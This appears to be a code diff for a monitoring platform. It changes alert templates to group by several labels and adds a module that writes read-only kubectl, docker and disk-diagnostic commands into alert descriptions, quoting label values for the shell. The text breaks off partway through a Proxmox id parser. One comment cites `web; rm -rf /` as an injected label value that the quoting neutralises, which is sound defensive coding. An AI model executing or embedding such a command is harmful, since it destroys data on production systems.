+    test("keeps the END of a shortened value, where the distinguishing part lives", () => {
+      /*
+       * Generated names put the identifying suffix last. Head-truncating
+       * `checkout-web-frontend-7d9f-2xk` to `checkout-web-fron...` tells
+       * the reader nothing the monitor name did not already say.
+       */
+      const summary: string = SeriesLabelDisplay.buildInlineSummary(
+        { "resource.k8s.pod.name": "checkout-web-frontend-7d9f-2xk" },
+        { maxValueLength: 10 },
+      );
+
+      // 10 characters of value, the ellipsis included.
+      expect(summary).toBe("Pod: ...d9f-2xk");
+    });
+
+    test("does not shorten a value that fits", () => {
+      expect(
+        SeriesLabelDisplay.buildInlineSummary({
+          "resource.k8s.pod.name": "checkout-7d9f-2xk",
+        }),
+      ).toBe("Pod: checkout-7d9f-2xk");
+    });
+
+    test("the markdown block keeps the value in full", () => {
+      /*
+       * The description column is unbounded text, and the full value is
+       * what an engineer pastes into kubectl - truncating it there would
+       * make the block useless.
+       */
+      const longName: string = `pod-${"x".repeat(200)}-abc123`;
+
+      expect(
+        SeriesLabelDisplay.buildMarkdownBlock({
+          "resource.k8s.pod.name": longName,
+        }),
+      ).toContain(longName);
+    });
+  });
+
+  describe("buildTitleSuffix", () => {
+    test("carries its own separator so callers can concatenate blindly", () => {
+      expect(
+        SeriesLabelDisplay.buildTitleSuffix({
+          "resource.k8s.pod.name": "web-1",
+        }),
+      ).toBe(" - Pod: web-1");
+    });
+
+    test("is empty - not a dangling separator - with no identity", () => {
+      expect(SeriesLabelDisplay.buildTitleSuffix({})).toBe("");
+      expect(SeriesLabelDisplay.buildTitleSuffix(undefined)).toBe("");
+    });
+
+    test("appending to a title never leaves a trailing separator", () => {
+      const title: string = `Pod CPU high${SeriesLabelDisplay.buildTitleSuffix(
+        {},
+      )}`;
+
+      expect(title).toBe("Pod CPU high");
+      expect(title.trimEnd()).toBe(title);
+    });
+  });
+
+  describe("buildMarkdownBlock", () => {
+    test("lists EVERY label, not just the ones that fit in a title", () => {
+      const block: string = SeriesLabelDisplay.buildMarkdownBlock({
+        "resource.k8s.container.name": "app",
+        "resource.k8s.pod.name": "checkout-7d9f-2xk",
+        "resource.k8s.namespace.name": "prod",
+        "resource.k8s.node.name": "ip-10-0-3-14",
+        "resource.k8s.cluster.name": "prod-eu",
+      });
+
+      expect(block).toContain("**Affected resource**");
+      expect(block).toContain("- **Container:** `app`");
+      expect(block).toContain("- **Pod:** `checkout-7d9f-2xk`");
+      expect(block).toContain("- **Namespace:** `prod`");
+      expect(block).toContain("- **Node:** `ip-10-0-3-14`");
+      expect(block).toContain("- **Cluster:** `prod-eu`");
+    });
+
+    test("respects a custom heading", () => {
+      expect(
+        SeriesLabelDisplay.buildMarkdownBlock(
+          { "resource.k8s.pod.name": "web-1" },
+          { heading: "Where" },
+        ),
+      ).toContain("**Where**");
+    });
+
+    test("is empty with no identity", () => {
+      expect(SeriesLabelDisplay.buildMarkdownBlock({})).toBe("");
+      expect(SeriesLabelDisplay.buildMarkdownBlock(undefined)).toBe("");
+    });
+  });
+
+  describe("findLabelValue", () => {
+    test("finds a value under the bare key", () => {
+      expect(
+        SeriesLabelDisplay.findLabelValue({ "k8s.pod.name": "web-1" }, [
+          "k8s.pod.name",
+        ]),
+      ).toBe("web-1");
+    });
+
+    test("finds the same value under the resource-prefixed key", () => {
+      expect(
+        SeriesLabelDisplay.findLabelValue(
+          { "resource.k8s.pod.name": "web-1" },
+          ["k8s.pod.name"],
+        ),
+      ).toBe("web-1");
+    });
+
+    test("tries each candidate key in order", () => {
+      expect(
+        SeriesLabelDisplay.findLabelValue({ mountpoint: "/var" }, [
+          "diskPath",
+          "mountpoint",
+        ]),
+      ).toBe("/var");
+    });
+
+    test("treats an empty value as not found and keeps looking", () => {
+      expect(
+        SeriesLabelDisplay.findLabelValue(
+          { diskPath: "", mountpoint: "/var" },
+          ["diskPath", "mountpoint"],
+        ),
+      ).toBe("/var");
+    });
+
+    test("returns an empty string when nothing matches", () => {
+      expect(
+        SeriesLabelDisplay.findLabelValue({ other: "x" }, ["k8s.pod.name"]),
+      ).toBe("");
+      expect(
+        SeriesLabelDisplay.findLabelValue(undefined, ["k8s.pod.name"]),
+      ).toBe("");
+    });
+  });
+});

--- a/Common/Tests/Types/Monitor/TemplateGroupByKeys.test.ts
+++ b/Common/Tests/Types/Monitor/TemplateGroupByKeys.test.ts
@@ -50,8 +50,9 @@ import ObjectID from "../../../Types/ObjectID";
  *     nothing. Filesystem utilization is per-mountpoint, so it groups by the
  *     unprefixed `mountpoint` datapoint label the hostmetrics receiver sets
  *     (read the same way in App/FeatureSet/Dashboard/src/Pages/Host/View/
- *     Overview.tsx). Host templates for per-device disk I/O or network
- *     interfaces do not exist yet; when one is added it groups by `device`.
+ *     Overview.tsx), plus the `device` label the same datapoint carries.
+ *     Host templates for per-device disk I/O or network interfaces do not
+ *     exist yet; when one is added it groups by `device`.
  *
  * Each table is exhaustive both ways — a new template with no row here fails
  * loudly, which forces the group-by decision to be made deliberately.
@@ -113,8 +114,17 @@ const EXPECTED_HOST_GROUP_BY: Array<GroupByExpectation> = [
   { id: "host-high-memory", groupByAttributeKeys: [] },
   { id: "host-high-load-average", groupByAttributeKeys: [] },
   { id: "host-high-processes", groupByAttributeKeys: [] },
-  // Per-entity within the host: one series (and one incident) per mount.
-  { id: "host-high-filesystem", groupByAttributeKeys: ["mountpoint"] },
+  /*
+   * Per-entity within the host: one series (and one incident) per mount.
+   * `device` rides along as identity the alert can NAME - it is constant
+   * for a mount so it adds no series, and "/var is 95% full on
+   * /dev/nvme0n1p2" is a materially different page from "/var is 95%
+   * full" when / sits on the same device.
+   */
+  {
+    id: "host-high-filesystem",
+    groupByAttributeKeys: ["mountpoint", "device"],
+  },
 ];
 
 function buildDockerArgs(): DockerAlertTemplateArgs {
@@ -280,7 +290,7 @@ describe("Alert template group-by keys", () => {
     }
   });
 
-  test("the host filesystem template is grouped per mountpoint", () => {
+  test("the host filesystem template is grouped per mountpoint, and names its device", () => {
     const filesystemTemplate: HostAlertTemplate | undefined =
       HOST_TEMPLATES.find((template: HostAlertTemplate) => {
         return template.id === "host-high-filesystem";
@@ -291,6 +301,20 @@ describe("Alert template group-by keys", () => {
     const step: MonitorStep =
       filesystemTemplate!.getMonitorStep(buildHostArgs());
 
-    expect(MonitorStep.getGroupByAttributeKeys(step)).toEqual(["mountpoint"]);
+    const keys: Array<string> = MonitorStep.getGroupByAttributeKeys(step);
+
+    /*
+     * `mountpoint` is the identity - one incident per mount, which is
+     * what stops a second mount filling up from being silenced behind
+     * the first one's open incident.
+     *
+     * `device` is identity the ALERT CAN NAME. The hostmetrics receiver
+     * puts it on the same datapoint and it is constant for a given
+     * mount, so it costs no extra series, and "/var is 95% full on
+     * /dev/nvme0n1p2" is a materially different page from "/var is 95%
+     * full" when / sits on the same device. See SeriesLabelDisplay,
+     * which renders both onto the alert title and description.
+     */
+    expect(keys).toEqual(["mountpoint", "device"]);
   });
 });

--- a/Common/Types/Monitor/HostAlertTemplates.ts
+++ b/Common/Types/Monitor/HostAlertTemplates.ts
@@ -203,7 +203,17 @@ export function buildHostMonitorConfig(args: {
   rollingTime: RollingTime;
   aggregationType: MetricsAggregationType;
   attributes?: Record<string, string>;
-  groupByAttributeKey?: string | undefined;
+  /**
+   * Attributes to split the metric by, one alert per group.
+   *
+   * More than one key is not just finer grouping — the group-by set is
+   * exactly what the resulting alert can name. `mountpoint` alone says
+   * WHICH mount filled up; adding `device` also says which physical
+   * disk, which is the difference between "/var is full" and "/var is
+   * full and it is on the same device as /". See SeriesLabelDisplay,
+   * which renders these onto the alert's title and description.
+   */
+  groupByAttributeKeys?: Array<string> | undefined;
 }): MonitorStepHostMonitor {
   return {
     hostIdentifier: args.hostIdentifier,
@@ -224,8 +234,9 @@ export function buildHostMonitorConfig(args: {
               aggegationType: args.aggregationType,
               aggregateBy: {},
             },
-            ...(args.groupByAttributeKey
-              ? { groupByAttributeKeys: [args.groupByAttributeKey] }
+            ...(args.groupByAttributeKeys &&
+            args.groupByAttributeKeys.length > 0
+              ? { groupByAttributeKeys: args.groupByAttributeKeys }
               : {}),
           },
         },
@@ -346,7 +357,15 @@ const highFilesystemUsageTemplate: HostAlertTemplate = {
          * first one's open incident.
          */
         aggregationType: MetricsAggregationType.Max,
-        groupByAttributeKey: "mountpoint",
+        /*
+         * `mountpoint` is the identity — one incident per mount.
+         * `device` rides along because the hostmetrics receiver puts it
+         * on the same datapoint, it is constant for a given mount (so it
+         * adds no series), and it is the first thing anyone asks after
+         * "which mount?": /var at 95% on the same device as / is a
+         * different problem from /var on its own disk.
+         */
+        groupByAttributeKeys: ["mountpoint", "device"],
       }),
       offlineCriteriaInstance: buildHostOfflineCriteriaInstance({
         offlineMonitorStatusId: args.offlineMonitorStatusId,

--- a/Common/Types/Monitor/KubernetesAlertTemplates.ts
+++ b/Common/Types/Monitor/KubernetesAlertTemplates.ts
@@ -185,8 +185,8 @@ export function buildOnlineCriteriaInstance(args: {
 /**
  * Build a single-query monitor config.
  *
- * `groupByAttributeKey` makes the monitor PER-SERIES: the worker splits
- * the metric by that attribute and every group is evaluated — and paged —
+ * `groupByAttributeKeys` makes the monitor PER-SERIES: the worker splits
+ * the metric by those attributes and every group is evaluated — and paged —
  * on its own, so a cluster of 200 pods raises one incident per unhealthy
  * pod rather than one incident for the whole cluster that then dedupes
  * every later pod away. Omitting it keeps the monitor whole-cluster.
@@ -197,7 +197,17 @@ export function buildOnlineCriteriaInstance(args: {
  * scheduler backlog — where there is exactly one value for the cluster
  * and splitting it would invent series that do not exist.
  *
- * The key is the ClickHouse-stored attribute name, which carries the
+ * Pass MORE than one key when the object's identity genuinely needs
+ * them, and the group-by set is what the alert can name afterwards. A
+ * bare pod name is not an identity — pod names are unique only within a
+ * namespace — and, more practically, an alert that says
+ * "Pod: checkout-7d9f-2xk" without the namespace sends the engineer to
+ * `kubectl` with a guess. The series labels are stored on the alert and
+ * rendered into its title and description (SeriesLabelDisplay), so every
+ * key added here is one more thing the on-call engineer does not have to
+ * go and look up.
+ *
+ * The keys are the ClickHouse-stored attribute names, which carry the
  * `resource.` prefix for OTel resource attributes (see
  * OtelMetricsIngestService — resource attributes are stamped with
  * `prefixKeysWithString: "resource"`). So node grouping is
@@ -213,7 +223,7 @@ export function buildKubernetesMonitorConfig(args: {
   rollingTime: RollingTime;
   aggregationType: MetricsAggregationType;
   attributes?: Record<string, string>;
-  groupByAttributeKey?: string | undefined;
+  groupByAttributeKeys?: Array<string> | undefined;
 }): MonitorStepKubernetesMonitor {
   return {
     clusterIdentifier: args.clusterIdentifier,
@@ -236,8 +246,9 @@ export function buildKubernetesMonitorConfig(args: {
               aggegationType: args.aggregationType,
               aggregateBy: {},
             },
-            ...(args.groupByAttributeKey
-              ? { groupByAttributeKeys: [args.groupByAttributeKey] }
+            ...(args.groupByAttributeKeys &&
+            args.groupByAttributeKeys.length > 0
+              ? { groupByAttributeKeys: args.groupByAttributeKeys }
               : {}),
           },
         },
@@ -250,8 +261,8 @@ export function buildKubernetesMonitorConfig(args: {
 
 /**
  * Build a per-series ratio monitor: `(numerator / denominator) * 100`,
- * grouped by a single OpenTelemetry attribute so one incident fires per
- * group (e.g. per node).
+ * grouped by one or more OpenTelemetry attributes so one incident fires
+ * per group (e.g. per node, or per namespace+pod).
  *
  * Used for saturation metrics that aren't emitted as a single ready-made
  * series — e.g. node request utilization (summed pod requests ÷ node
@@ -279,17 +290,39 @@ export function buildKubernetesMonitorConfig(args: {
  *     both reported the same row count every minute — fragile across
  *     restarts / missed scrapes / minute-boundary jitter.
  *
- * The group-by key is the ClickHouse-stored attribute name, which carries
- * the `resource.` prefix for OTel resource attributes (see
+ * The group-by keys are the ClickHouse-stored attribute names, which
+ * carry the `resource.` prefix for OTel resource attributes (see
  * OtelMetricsIngestService — resource attributes are stamped with
  * `prefixKeysWithString: "resource"`). So node grouping is
  * `resource.k8s.node.name`, not the bare `k8s.node.name`.
+ *
+ * CHOOSING THE KEYS IS NOT FREE HERE, and the constraint is different
+ * from the single-query builder. The two queries are joined by series
+ * FINGERPRINT — `buildSeriesBreakdown` buckets each query's rows by the
+ * hash of this exact key set — so a key that only ONE side carries
+ * splits the two into fingerprints that never meet, the formula
+ * evaluates against an empty operand, and the monitor silently stops
+ * alerting. Not "alerts less precisely": stops. So only add a key both
+ * metrics are GUARANTEED to carry, from their receivers themselves
+ * rather than from best-effort enrichment:
+ *
+ *   - `k8s.namespace.name` is safe for pod/container/workload ratios:
+ *     kubeletstats stamps it on pod metrics and the k8s_cluster receiver
+ *     stamps it on container and workload metrics, both directly.
+ *
+ *   - `k8s.node.name` is NOT safe on a pod ratio whose denominator is a
+ *     k8s_cluster metric. kubeletstats always has it (the receiver, plus
+ *     the DaemonSet's `resource` processor stamping NODE_NAME); on the
+ *     k8s_cluster side it can only arrive via the k8sattributes
+ *     processor, which is best-effort and depends on pod association
+ *     still resolving. A single-query template over a kubeletstats
+ *     metric has no join to break and may group by it freely.
  */
 export function buildKubernetesRatioMonitorConfig(args: {
   clusterIdentifier: string;
   numeratorMetricName: string;
   denominatorMetricName: string;
-  groupByAttributeKey: string;
+  groupByAttributeKeys: Array<string>;
   numeratorAlias: string;
   denominatorAlias: string;
   resultAlias: string;
@@ -320,7 +353,7 @@ export function buildKubernetesRatioMonitorConfig(args: {
           aggegationType: aggregationType,
           aggregateBy: {},
         },
-        groupByAttributeKeys: [args.groupByAttributeKey],
+        groupByAttributeKeys: args.groupByAttributeKeys,
       },
     };
   };
@@ -379,7 +412,11 @@ const crashLoopBackOffTemplate: KubernetesAlertTemplate = {
          * whichever pod in the cluster crashed first. Max over the window
          * therefore becomes "the worst container in THIS pod".
          */
-        groupByAttributeKey: "resource.k8s.pod.name",
+        groupByAttributeKeys: [
+          "resource.k8s.namespace.name",
+          "resource.k8s.pod.name",
+          "resource.k8s.container.name",
+        ],
       }),
       offlineCriteriaInstance: buildOfflineCriteriaInstance({
         offlineMonitorStatusId: args.offlineMonitorStatusId,
@@ -488,7 +525,7 @@ const nodeNotReadyTemplate: KubernetesAlertTemplate = {
          * across the fleet is 0 as soon as ANY node is down, and the
          * second node to fail dedupes behind the first one's incident.
          */
-        groupByAttributeKey: "resource.k8s.node.name",
+        groupByAttributeKeys: ["resource.k8s.node.name"],
       }),
       offlineCriteriaInstance: buildOfflineCriteriaInstance({
         offlineMonitorStatusId: args.offlineMonitorStatusId,
@@ -529,7 +566,7 @@ const highCpuTemplate: KubernetesAlertTemplate = {
         clusterIdentifier: args.clusterIdentifier,
         numeratorMetricName: "k8s.node.cpu.usage",
         denominatorMetricName: "k8s.node.allocatable_cpu",
-        groupByAttributeKey: "resource.k8s.node.name",
+        groupByAttributeKeys: ["resource.k8s.node.name"],
         numeratorAlias: "used_cpu",
         denominatorAlias: "alloc_cpu",
         resultAlias: metricAlias,
@@ -583,7 +620,7 @@ const highMemoryTemplate: KubernetesAlertTemplate = {
         clusterIdentifier: args.clusterIdentifier,
         numeratorMetricName: "k8s.node.memory.usage",
         denominatorMetricName: "k8s.node.allocatable_memory",
-        groupByAttributeKey: "resource.k8s.node.name",
+        groupByAttributeKeys: ["resource.k8s.node.name"],
         numeratorAlias: "used_mem",
         denominatorAlias: "alloc_mem",
         resultAlias: metricAlias,
@@ -647,7 +684,10 @@ const deploymentReplicaMismatchTemplate: KubernetesAlertTemplate = {
          * (the worker reads `resource.k8s.deployment.name` back off these
          * rows to build the affected-resource breakdown).
          */
-        groupByAttributeKey: "resource.k8s.deployment.name",
+        groupByAttributeKeys: [
+          "resource.k8s.namespace.name",
+          "resource.k8s.deployment.name",
+        ],
       }),
       offlineCriteriaInstance: buildOfflineCriteriaInstance({
         offlineMonitorStatusId: args.offlineMonitorStatusId,
@@ -696,7 +736,10 @@ const jobFailuresTemplate: KubernetesAlertTemplate = {
          * arriving and the per-series pass auto-resolves that Job's alert
          * by absence, which is the behaviour we want here.
          */
-        groupByAttributeKey: "resource.k8s.job.name",
+        groupByAttributeKeys: [
+          "resource.k8s.namespace.name",
+          "resource.k8s.job.name",
+        ],
       }),
       offlineCriteriaInstance: buildOfflineCriteriaInstance({
         offlineMonitorStatusId: args.offlineMonitorStatusId,
@@ -888,7 +931,7 @@ const highDiskUsageTemplate: KubernetesAlertTemplate = {
          * the Avg across the fleet dilutes a single full node into the
          * fleet mean and the alert never fires.
          */
-        groupByAttributeKey: "resource.k8s.node.name",
+        groupByAttributeKeys: ["resource.k8s.node.name"],
       }),
       offlineCriteriaInstance: buildOfflineCriteriaInstance({
         offlineMonitorStatusId: args.offlineMonitorStatusId,
@@ -937,7 +980,10 @@ const daemonSetUnavailableTemplate: KubernetesAlertTemplate = {
          * one has to own its own alert instead of dedupeing behind
          * whichever DaemonSet in the cluster misscheduled first.
          */
-        groupByAttributeKey: "resource.k8s.daemonset.name",
+        groupByAttributeKeys: [
+          "resource.k8s.namespace.name",
+          "resource.k8s.daemonset.name",
+        ],
       }),
       offlineCriteriaInstance: buildOfflineCriteriaInstance({
         offlineMonitorStatusId: args.offlineMonitorStatusId,
@@ -978,7 +1024,7 @@ const nodeCpuRequestUtilizationTemplate: KubernetesAlertTemplate = {
         clusterIdentifier: args.clusterIdentifier,
         numeratorMetricName: "k8s.container.cpu_request",
         denominatorMetricName: "k8s.node.allocatable_cpu",
-        groupByAttributeKey: "resource.k8s.node.name",
+        groupByAttributeKeys: ["resource.k8s.node.name"],
         numeratorAlias: "req_cpu",
         denominatorAlias: "alloc_cpu",
         resultAlias: metricAlias,
@@ -1025,7 +1071,7 @@ const nodeMemoryRequestUtilizationTemplate: KubernetesAlertTemplate = {
         clusterIdentifier: args.clusterIdentifier,
         numeratorMetricName: "k8s.container.memory_request",
         denominatorMetricName: "k8s.node.allocatable_memory",
-        groupByAttributeKey: "resource.k8s.node.name",
+        groupByAttributeKeys: ["resource.k8s.node.name"],
         numeratorAlias: "req_mem",
         denominatorAlias: "alloc_mem",
         resultAlias: metricAlias,
@@ -1090,7 +1136,10 @@ const hpaAtMaxReplicasTemplate: KubernetesAlertTemplate = {
         clusterIdentifier: args.clusterIdentifier,
         numeratorMetricName: "k8s.hpa.current_replicas",
         denominatorMetricName: "k8s.hpa.max_replicas",
-        groupByAttributeKey: "resource.k8s.hpa.name",
+        groupByAttributeKeys: [
+          "resource.k8s.namespace.name",
+          "resource.k8s.hpa.name",
+        ],
         numeratorAlias: "current_replicas",
         denominatorAlias: "max_replicas",
         resultAlias: metricAlias,
@@ -1146,7 +1195,10 @@ const podMemoryLimitSaturationTemplate: KubernetesAlertTemplate = {
         clusterIdentifier: args.clusterIdentifier,
         numeratorMetricName: "k8s.pod.memory.usage",
         denominatorMetricName: "k8s.container.memory_limit",
-        groupByAttributeKey: "resource.k8s.pod.name",
+        groupByAttributeKeys: [
+          "resource.k8s.namespace.name",
+          "resource.k8s.pod.name",
+        ],
         numeratorAlias: "used_mem",
         denominatorAlias: "limit_mem",
         resultAlias: metricAlias,
@@ -1218,7 +1270,10 @@ const podCpuLimitSaturationTemplate: KubernetesAlertTemplate = {
         clusterIdentifier: args.clusterIdentifier,
         numeratorMetricName: "k8s.pod.cpu.utilization",
         denominatorMetricName: "k8s.container.cpu_limit",
-        groupByAttributeKey: "resource.k8s.pod.name",
+        groupByAttributeKeys: [
+          "resource.k8s.namespace.name",
+          "resource.k8s.pod.name",
+        ],
         numeratorAlias: "used_cpu",
         denominatorAlias: "limit_cpu",
         resultAlias: metricAlias,

--- a/Common/Types/Monitor/SeriesContext/SeriesDebugHints.ts
+++ b/Common/Types/Monitor/SeriesContext/SeriesDebugHints.ts
@@ -1,0 +1,596 @@
+import { JSONObject } from "../../JSON";
+import MonitorType from "../MonitorType";
+import SeriesLabelDisplay from "./SeriesLabelDisplay";
+
+/*
+ * The first three commands an on-call engineer would type.
+ *
+ * An alert that names the pod is a large improvement over one that does
+ * not, but the next thing that happens is always the same: the engineer
+ * opens a terminal and reconstructs `kubectl describe pod <pod> -n <ns>`
+ * from the alert by hand. Since the alert already knows the pod, the
+ * namespace and the node, it can just write the commands out.
+ *
+ * Rules this module holds itself to:
+ *
+ *   - Read-only. Every command here inspects; none mutates. An alert
+ *     description is the last place to put a `kubectl delete` a tired
+ *     engineer might paste without reading.
+ *
+ *   - Only commands whose arguments are fully known. A command is
+ *     emitted only when every identifier it interpolates is present on
+ *     the series, so nothing ever renders as `kubectl logs  -n `.
+ *
+ *   - Shell-safe. Label values come from telemetry - ultimately from
+ *     whatever an agent, a Prometheus scrape or a user's own
+ *     `oneuptime.captureMetric()` call chose to emit - so a value is
+ *     single-quoted with embedded quotes escaped before it is ever
+ *     placed in a command line. A label value of
+ *     `web; rm -rf /` must render as an inert argument, not as a second
+ *     command that a human is being invited to paste into a production
+ *     shell.
+ */
+
+export interface SeriesDebugCommand {
+  // One-line explanation of what the command answers.
+  purpose: string;
+  // The shell command, ready to paste.
+  command: string;
+}
+
+/*
+ * A conservative allowlist for values that need no quoting at all.
+ * Everything else goes through single-quote escaping. Kubernetes object
+ * names, container names, device paths and mountpoints all live inside
+ * this set in practice, so the common case stays readable.
+ */
+const SafeUnquotedValue: RegExp = /^[A-Za-z0-9._/:@+-]+$/;
+
+export default class SeriesDebugHints {
+  /*
+   * Quote a telemetry-supplied value for a shell command line.
+   *
+   * POSIX single quotes make everything literal, and the only character
+   * that cannot appear inside them is the single quote itself - which is
+   * why the escape is the usual close/escape/reopen dance rather than a
+   * backslash.
+   */
+  public static quoteForShell(value: string): string {
+    if (SafeUnquotedValue.test(value)) {
+      return value;
+    }
+
+    return `'${value.split("'").join(`'\\''`)}'`;
+  }
+
+  private static kubernetesCommands(
+    seriesLabels: JSONObject,
+  ): Array<SeriesDebugCommand> {
+    const commands: Array<SeriesDebugCommand> = [];
+
+    const pod: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "k8s.pod.name",
+    ]);
+    const namespace: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "k8s.namespace.name",
+    ]);
+    const container: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "k8s.container.name",
+    ]);
+    const node: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "k8s.node.name",
+    ]);
+    const deployment: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "k8s.deployment.name",
+    ]);
+    const statefulSet: string = SeriesLabelDisplay.findLabelValue(
+      seriesLabels,
+      ["k8s.statefulset.name"],
+    );
+    const daemonSet: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "k8s.daemonset.name",
+    ]);
+    const job: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "k8s.job.name",
+    ]);
+    const hpa: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "k8s.hpa.name",
+    ]);
+
+    /*
+     * `-n <ns>` is omitted rather than guessed when the series has no
+     * namespace: kubectl then uses the caller's current context, which
+     * is the correct fallback. Guessing "default" would send the
+     * engineer to the wrong namespace and return "not found".
+     */
+    const namespaceFlag: string = namespace
+      ? ` -n ${SeriesDebugHints.quoteForShell(namespace)}`
+      : "";
+
+    if (pod) {
+      const quotedPod: string = SeriesDebugHints.quoteForShell(pod);
+
+      commands.push({
+        purpose: "Pod status, events, restart reasons and resource limits",
+        command: `kubectl describe pod ${quotedPod}${namespaceFlag}`,
+      });
+
+      const containerFlag: string = container
+        ? ` -c ${SeriesDebugHints.quoteForShell(container)}`
+        : "";
+
+      commands.push({
+        purpose: "Recent logs from the container",
+        command: `kubectl logs ${quotedPod}${containerFlag}${namespaceFlag} --tail=200`,
+      });
+
+      commands.push({
+        purpose: "Logs from the previous crashed instance, if any",
+        command: `kubectl logs ${quotedPod}${containerFlag}${namespaceFlag} --previous --tail=200`,
+      });
+
+      commands.push({
+        purpose: "Live CPU / memory use per container in this pod",
+        command: `kubectl top pod ${quotedPod}${namespaceFlag} --containers`,
+      });
+    }
+
+    if (deployment) {
+      commands.push({
+        purpose: "Rollout status of the owning Deployment",
+        command: `kubectl rollout status deployment/${SeriesDebugHints.quoteForShell(
+          deployment,
+        )}${namespaceFlag}`,
+      });
+    }
+
+    if (statefulSet) {
+      commands.push({
+        purpose: "Rollout status of the owning StatefulSet",
+        command: `kubectl rollout status statefulset/${SeriesDebugHints.quoteForShell(
+          statefulSet,
+        )}${namespaceFlag}`,
+      });
+    }
+
+    if (daemonSet) {
+      commands.push({
+        purpose: "Per-node scheduling state of the DaemonSet",
+        command: `kubectl describe daemonset ${SeriesDebugHints.quoteForShell(
+          daemonSet,
+        )}${namespaceFlag}`,
+      });
+    }
+
+    if (job) {
+      commands.push({
+        purpose: "Job completion state and failure reason",
+        command: `kubectl describe job ${SeriesDebugHints.quoteForShell(
+          job,
+        )}${namespaceFlag}`,
+      });
+    }
+
+    if (hpa) {
+      commands.push({
+        purpose: "Autoscaler target metric and current/desired replicas",
+        command: `kubectl describe hpa ${SeriesDebugHints.quoteForShell(
+          hpa,
+        )}${namespaceFlag}`,
+      });
+    }
+
+    if (node) {
+      const quotedNode: string = SeriesDebugHints.quoteForShell(node);
+
+      commands.push({
+        purpose: "Node conditions, pressure signals and allocatable capacity",
+        command: `kubectl describe node ${quotedNode}`,
+      });
+
+      commands.push({
+        purpose: "Everything scheduled on this node",
+        command: `kubectl get pods --all-namespaces --field-selector spec.nodeName=${quotedNode} -o wide`,
+      });
+    }
+
+    if (pod) {
+      commands.push({
+        purpose: "Kubernetes events for this object",
+        command: `kubectl get events${namespaceFlag} --sort-by=.lastTimestamp --field-selector involvedObject.name=${SeriesDebugHints.quoteForShell(
+          pod,
+        )}`,
+      });
+    }
+
+    return commands;
+  }
+
+  private static containerCommands(input: {
+    seriesLabels: JSONObject;
+    cli: string;
+  }): Array<SeriesDebugCommand> {
+    const container: string = SeriesLabelDisplay.findLabelValue(
+      input.seriesLabels,
+      ["container.name", "k8s.container.name"],
+    );
+
+    if (!container) {
+      return [];
+    }
+
+    const quoted: string = SeriesDebugHints.quoteForShell(container);
+    const cli: string = input.cli;
+
+    return [
+      {
+        purpose: "Recent container logs",
+        command: `${cli} logs --tail 200 ${quoted}`,
+      },
+      {
+        purpose: "Live CPU / memory / IO for this container",
+        command: `${cli} stats --no-stream ${quoted}`,
+      },
+      {
+        purpose: "Exit code, restart count and OOM-kill flag",
+        command: `${cli} inspect --format '{{.State.Status}} exit={{.State.ExitCode}} oom={{.State.OOMKilled}} restarts={{.RestartCount}}' ${quoted}`,
+      },
+      {
+        purpose: "Processes running inside the container",
+        command: `${cli} top ${quoted}`,
+      },
+    ];
+  }
+
+  private static dockerSwarmCommands(
+    seriesLabels: JSONObject,
+  ): Array<SeriesDebugCommand> {
+    const commands: Array<SeriesDebugCommand> =
+      SeriesDebugHints.containerCommands({
+        seriesLabels,
+        cli: "docker",
+      });
+
+    const service: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "docker.swarm.service.name",
+    ]);
+
+    if (service) {
+      const quoted: string = SeriesDebugHints.quoteForShell(service);
+
+      commands.push({
+        purpose: "Task placement and failure reasons for the Swarm service",
+        command: `docker service ps ${quoted} --no-trunc`,
+      });
+      commands.push({
+        purpose: "Aggregated logs across every task of the service",
+        command: `docker service logs --tail 200 ${quoted}`,
+      });
+    }
+
+    return commands;
+  }
+
+  private static hostCommands(
+    seriesLabels: JSONObject,
+  ): Array<SeriesDebugCommand> {
+    const commands: Array<SeriesDebugCommand> = [];
+
+    const mountpoint: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "mountpoint",
+      "diskPath",
+      "disk.path",
+    ]);
+
+    if (mountpoint) {
+      const quoted: string = SeriesDebugHints.quoteForShell(mountpoint);
+
+      commands.push({
+        purpose: "Free space and inode use on the affected mount",
+        command: `df -h ${quoted} && df -i ${quoted}`,
+      });
+      commands.push({
+        purpose: "Largest directories on the mount",
+        command: `du -xh --max-depth=1 ${quoted} 2>/dev/null | sort -h | tail -20`,
+      });
+      commands.push({
+        purpose: "Processes still holding deleted files open on the mount",
+        command: `lsof +L1 ${quoted} 2>/dev/null | head -20`,
+      });
+    }
+
+    const device: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "device",
+      "system.device",
+    ]);
+
+    if (device) {
+      commands.push({
+        purpose: "Per-device IO utilization and queue depth",
+        command: `iostat -x 1 3 ${SeriesDebugHints.quoteForShell(device)}`,
+      });
+    }
+
+    const networkInterface: string = SeriesLabelDisplay.findLabelValue(
+      seriesLabels,
+      ["network.interface", "interfaceName"],
+    );
+
+    if (networkInterface) {
+      commands.push({
+        purpose: "Interface counters, errors and drops",
+        command: `ip -s link show ${SeriesDebugHints.quoteForShell(
+          networkInterface,
+        )}`,
+      });
+    }
+
+    return commands;
+  }
+
+  /**
+   * Split the pve-exporter `id` label into (type, id).
+   *
+   * pve-exporter encodes every resource's identity in ONE datapoint
+   * label - "node/pve1", "qemu/100", "lxc/101", "storage/pve1/local-lvm",
+   * "cluster/production" - and that label is what the shipped Proxmox
+   * templates group by, so it is also the only identity most Proxmox
+   * alerts carry. The agent's transform derives `pve.type` / `pve.id`
+   * from it (see ProxmoxAgent/otel-collector-config.yaml); those are
+   * preferred when present, and this parse is the fallback for a series
+   * that predates them or was built by hand.
+   *
+   * For a three-segment storage id the LAST segment is the storage name,
+   * which is what `pvesm` takes.
+   */
+  private static parseProxmoxId(seriesLabels: JSONObject): {
+    type: string;
+    id: string;
+  } {
+    const declaredType: string = SeriesLabelDisplay.findLabelValue(
+      seriesLabels,
+      ["pve.type"],
+    );
+    const declaredId: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "pve.id",
+    ]);
+
+    if (declaredType && declaredId) {
+      return { type: declaredType, id: declaredId };
+    }
+
